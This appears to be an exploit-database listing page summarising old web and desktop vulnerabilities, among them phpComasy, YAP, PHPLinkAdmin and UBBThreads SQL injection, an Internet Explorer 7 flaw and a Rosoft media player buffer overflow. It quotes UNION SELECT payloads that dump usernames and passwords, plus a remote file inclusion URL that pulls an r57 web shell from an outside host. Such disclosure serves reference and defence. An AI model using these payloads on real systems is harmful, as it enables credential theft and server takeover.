header-logo
Suggest Exploit
explore-vulnerabilities

Explore Vulnerabilities

Version
Year

Explore all Exploits:

phpComasy(entry_id) SQL-injection Vulnerability

An attacker can exploit this vulnerability by sending a malicious SQL query to the vulnerable parameter entry_id. An example of such a query is -9999+union+all+select+1,concat(username,char(58),password),3,4+from+user-- or -9999+union+all+select+1,concat(username,char(58),password),3,4,5,6,7,8,9,0,11,12,13,14+from+user--&mod_action=detail. This query will allow the attacker to view the username and password of the users in the database.

Microsoft Internet Explorer 7.0.5730.13 – ‘removeChild()’ Remote Code Execution

This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Internet Explorer. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of the removeChild() method. By passing an object to the removeChild() method, an attacker can cause a NULL pointer dereference resulting in a crash.

YAP 1.1.1 Blind SQL Injection/SQL Injection

The default prefix for database tables is 'yap_' but can be changed at installation. A PoC is provided to demonstrate how to extract the username and password from the database. An SQL injection is also provided to extract the username and password from the database, but the user must be logged in as an administrator.

Beerwin’s PHPLinkAdmin 1.0 Remote File Inclusion/SQL Injection

PHPLinkAdmin 1.0 is vulnerable to Remote File Inclusion and SQL Injection. The vulnerable code is present in linkadmin.php and edlink.php respectively. The PoC for Remote File Inclusion is http://127.0.0.1/path/linkadmin.php?page=http://www.kortech.cn/bbs//skin/zero_vote/r57.txt? and for SQL Injection is http://127.0.0.1/path/edlink.php?linkid=-1' union all select 1,2,3,4,concat_ws(0x3a,user(),database(),version())'--

Rosoft media player free local buffer overflow Exploit multi targets

This exploit allows an attacker to execute arbitrary code on a vulnerable system by exploiting a buffer overflow vulnerability in Rosoft media player. The exploit is multi-targeted and works on Microsoft Windows Trust SP3 (Frensh), Microsoft Windows Trust SP2 (Frensh), Microsoft Windows XP SP3 (Frensh) and Microsoft Windows XP SP2 (Frensh). The attacker can choose to execute either calc.exe or bindshell LPORT=7777. The exploit is coded by SimO-s0fT and was released in 2008.

Admin Login SQL Injection

UBBThreads is vulnerable to SQL injection in the admin login page. An attacker can use the UNION SELECT statement to obtain the admin users' plaintext passwords. The attacker can also turn on file attachments via /ubbthreads/admin/editconfig.php?Cat= and then upload a php command shell as an attachment to a post. Additionally, the attacker can query the MySQL database via /ubbthreads/admin/dbcommand.php?Cat= and get the MySQL username/password (which is stored in plaintext) by viewing the HTML Source of /ubbthreads/admin/editconfig.php?Cat=.

Recent Exploits: